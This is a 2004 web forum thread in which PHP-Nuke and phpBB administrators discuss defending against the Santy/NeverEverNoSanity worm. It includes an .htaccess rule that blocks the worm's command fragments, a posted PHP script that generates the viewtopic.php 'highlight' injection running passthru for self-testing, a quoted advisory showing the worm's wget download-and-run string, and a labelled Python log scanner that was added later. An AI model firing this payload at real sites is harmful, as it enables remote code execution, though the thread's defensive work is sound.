Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
blith
Client
Joined: Jul 18, 2003
Posts: 977
Posted: Wed Dec 22, 2004 8:14 am

Thanks...
 
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2496
Posted: Wed Dec 22, 2004 9:36 am

phpBB boards running version 2.0.11 aren't vulnerable. Also google filtered the search string already so it shouldn't be "in the wild" anymore.

blith
Posted: Wed Dec 22, 2004 9:45 am

Thank you. I am so paranoid... who's that?
 
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
Posted: Wed Dec 22, 2004 10:17 am

somebody called ?
 
sixonetonoffun
Posted: Wed Dec 22, 2004 10:50 am

Also, if I understand it correctly, () chars are used in the request and they would be trapped even on a default Nuke install.
 
BohrMe
Hangin' Around
Joined: May 01, 2004
Posts: 28
Location: Fall River, MA
Posted: Wed Dec 22, 2004 11:26 am

I'm running a heavily modified version of 6.9 and I really don't want to upgrade to a 7.x release in order to protect against this worm. I don't know which would be worse, cleaning up after the worm or changing my codebase. And I've already cleaned up one phpBB site that I help maintain!

sixonetonoffun
Posted: Wed Dec 22, 2004 11:39 am

Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php
 
BohrMe
Posted: Wed Dec 22, 2004 11:46 am

No, I don't use Nuke-Sentinel but I have taken some preliminary actions to help prevent the exploit... Other than a .htaccess modification, of course.
 
blith
Posted: Wed Dec 22, 2004 11:46 am

sixonetonoffun wrote:
Are you using Nuke-Sentinel?
If so I think you could enter viewtopic.php as one of the string blockers for some added protection and maybe even NeverEverNoSanity. I'm sure Bob, Raven and others are looking very closely at the specific exploit to see if it can be used against the bbtonuke port. This should work though because viewtopic should always be accessed as file=viewtopic not viewtopic.php


What could we put into the string blocker?
 
manunkind
Client
Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM
Posted: Thu Dec 23, 2004 7:54 am

Is it just in viewtopic.php? I ask this because I upgraded a few weeks ago to version 2.0.11 and I looked when I saw that posting and that file still had the old code in it. I replaced the code ASAP but was curious about it because people are saying that version 2.0.11 is already patched.
 
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3191
Location: Germany; Moderator, German NukeSentinel Support
Posted: Thu Dec 23, 2004 8:00 am

Maybe it's not enough to fix viewtopic.php?
Today the results for a search on google.de:
"This site is defaced": 343,000 for this site is defaced NeverEverNoSanity WebWorm generation 15
 
beetraham
Regular
Joined: Dec 13, 2003
Posts: 94
Location: Finland (EU)
Posted: Thu Dec 23, 2004 8:50 am

As an additional security measure, please find below an example of an .htaccess-based security block (to be inserted into the $NUKEROOT .htaccess file, for those affected by the presence of htaccess):

Code:

Options +SymlinksIfOwnerMatch
RewriteEngine On
# Any request whose query string contains "echr" or "esystem" is rewritten to /
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^(.*) /

As a result of the above block, requests containing the command fragments detected in the worm's attack are filtered out before execution.

[please note: this may not be a bulletproof method for you - the additional measures listed are based on recommendations received from a trusted ISP. It seems to be quite generally suspected that this worm (or rather, its variants) will also use other media than merely phpBB in the future to perform these sorts of attacks.]

-beetraham

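A defender-side check for the patterns discussed in this thread, added here as an example and not code from the original thread, NukeSentinel or phpBB: the scanner below parses constructed Apache access-log lines, mirrors the posted RewriteCond test on the raw query string, and then %-decodes the query twice (the %2527 wrapping seen in VinDSL's test script later in the thread) before matching, which shows why a raw-string rule misses hex-encoded variants. The log format, signature list, helper names and sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote, urlsplit

# Signatures from this thread: the posted .htaccess blocks "echr" and "esystem";
# the posted test script injects a passthru() call through "highlight".
SIGNATURES = ("echr", "esystem", "passthru")

# Minimal Apache common-log parser (assumed format, for this example only).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def htaccess_rule_matches(url):
    """Mimic the posted RewriteCond pair: mod_rewrite tests the raw, undecoded query string."""
    return re.search(r'echr|esystem', urlsplit(url).query) is not None

def decode_twice(text):
    """Two rounds of %-decoding, as the posted %2527 trick needs (%2527 -> %27 -> ')."""
    return unquote(unquote(text))

def classify_request(url):
    """Return the Santy indicators found in one request URL (empty list if clean)."""
    raw_qs = urlsplit(url).query
    decoded = decode_twice(raw_qs).lower()
    hits = [s for s in SIGNATURES if s in decoded]
    if re.search(r'highlight=%2527', raw_qs, re.IGNORECASE):
        hits.append("double-encoded quote in highlight")
    return hits

def scan_log(log_text):
    """Return (ip, status, indicators, caught_by_htaccess_rule) for each suspicious line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["url"])
        if hits:
            findings.append((m["ip"], m["status"], hits, htaccess_rule_matches(m["url"])))
    return findings

# Constructed sample log lines (not from the thread); 203.0.113.0/24 is documentation address space.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Dec/2004:08:50:01 -0600] "GET /index.php?name=Forums&file=viewtopic&t=7&highlight=nuke HTTP/1.1" 200 8123
203.0.113.9 - - [23/Dec/2004:08:51:12 -0600] "GET /viewtopic.php?t=7&highlight=%2527.esystem.%2527 HTTP/1.0" 403 312
203.0.113.9 - - [23/Dec/2004:08:51:40 -0600] "GET /viewtopic.php?t=7&highlight=%2527.%65%73%79%73%74%65%6d.%2527 HTTP/1.0" 200 5120
"""

if __name__ == "__main__":
    for ip, status, hits, blocked in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} indicators={hits} htaccess_rule_hit={blocked}")
```

The third sample line carries the same "esystem" fragment as the second, only hex-encoded, and the raw-string rule does not see it; matching after decoding does.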
BohrMe
Posted: Thu Dec 23, 2004 8:54 am

How did you get so many hits for that search? When I go to google.de and search for the phrase "This site is defaced" I only get around 3,590. Yesterday that number was only 1,520 on google.com.
 
Susann
Posted: Thu Dec 23, 2004 10:40 am

Only registered users can see links on this board! Get registered or login!

or you try: allinurl:viewtopic.php
 
BohrMe
Posted: Thu Dec 23, 2004 10:47 am

You should place quotes around your search string or just search for NeverEverNoSanity because you are getting a lot of false hits that have nothing to do with the Sanity worm.
 
BohrMe
Posted: Thu Dec 23, 2004 10:49 am

Oh yeah, the allinurl:viewtopic.php produces a 403. Google shut that search down because of Sanity.
 
brine
New Member
Joined: Jan 28, 2004
Posts: 10
Posted: Thu Dec 23, 2004 10:22 pm

I guess sites that did not upgrade are safe for now...

Only registered users can see links on this board! Get registered or login!
 
BohrMe
Posted: Thu Dec 23, 2004 10:59 pm

Hopefully, it's a lesson well learned by Google and all.
 
brine
Posted: Fri Dec 24, 2004 7:06 am

BohrMe wrote:
Hopefully, it's a lesson well learned by Google and all.


Somehow, I do think it will be.
 
sixonetonoffun
Posted: Fri Dec 24, 2004 8:36 am

One of the regulars is seeing a variant that is intended to exploit the phpNuke port at a very disturbing rate, approx. 25 per hour. Sentinel trapped it, but that indicates it's getting past Apache. I tested it on a couple of sites of my own and it throws a 403.

Best thing is to make sure your viewtopic.php is patched regardless of Google's response.
 
BohrMe
Posted: Fri Dec 24, 2004 8:42 am

brine wrote:
Somehow, I do think it will be.


I've met some of the Google guys (namely Rob Pike) and they're sharper than you think.
 
VinDSL
Life Cycles Becoming CPU Cycles
Joined: Jul 11, 2004
Posts: 614
Location: Arizona (USA); Admin: NukeCops.com, Disipal Designs, Lenon.com
Posted: Fri Dec 24, 2004 10:42 am

You can use this script to see if your phpBB is vulnerable...
Code:
<?php

$p='ls -al';
$highlight='passthru($HTTP_GET_VARS[p])';

print "?t=%37&p=";

for ($i=0; $i<strlen($p); ++$i) {
 print '%' . bin2hex(substr($p,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
 print '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>

Running this script on your web site should generate a request parameter.

All you need to do is copy 'n' paste the result onto:
Code:
http://your-site.com/index.php?name=Forums&file=viewtopic

Example:
Code:
http://your-site.com/index.php?name=Forums&file=viewtopic&?t=%37&p=%6c%73%20...<yada,yada>

As sixonetonoffun said, Nuke should trap it, even on a default install...

Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17086
Posted: Fri Dec 24, 2004 3:54 pm

NukeSentinel traps it, but if you want to stop it at the server level, see my post Only registered users can see links on this board! Get registered or login!
 
beetraham
Posted: Sat Dec 25, 2004 7:59 pm

Just as a heads-up...

Quote:
[http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0]

To: BugTraq
Subject: New Santy-Worm attacks *all* PHP-skripts
Date: Dec 25 2004 5:12PM
Author: Juergen Schmidt <ju heisec de>
Message-ID: <Pine.LNX.4.58.0412251805110.19888@loki.ct.heise.de>

Hello,

the new santy version not only attacks phpBB.

It uses the Brazilian Google site to find all kinds of PHP scripts.
It parses their URLs and overwrites variables with strings like:
Only registered users can see links on this board! Get registered or login! /tmp;wget Only registered users can see links on this board! Get registered or login!

Often enough this leads to download and execution of code. On success the worm connects to an IRC server, where already more than 700 zombies are waiting for commands.

 
PHrEEkie
Subject Matter Expert
Joined: Feb 23, 2004
Posts: 358
Posted: Sat Dec 25, 2004 9:38 pm

Ok, now I understand exactly why I haven't had even one attack across an entire server running multiple Nukes and phpBB standalones. Way back when the Brazilian folks started focusing on Nuke vulns, I banned server-wide the entire continent of South America. I would then imagine that the brazilian Google engine has none of my server's content available.

Just luck, I guess... I've had those foos banned for almost 2 years, and now that this concentrated attack is under way, I haven't had even one hit so far. Wish I was this lucky playing the Lottery!

PHrEEk

Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours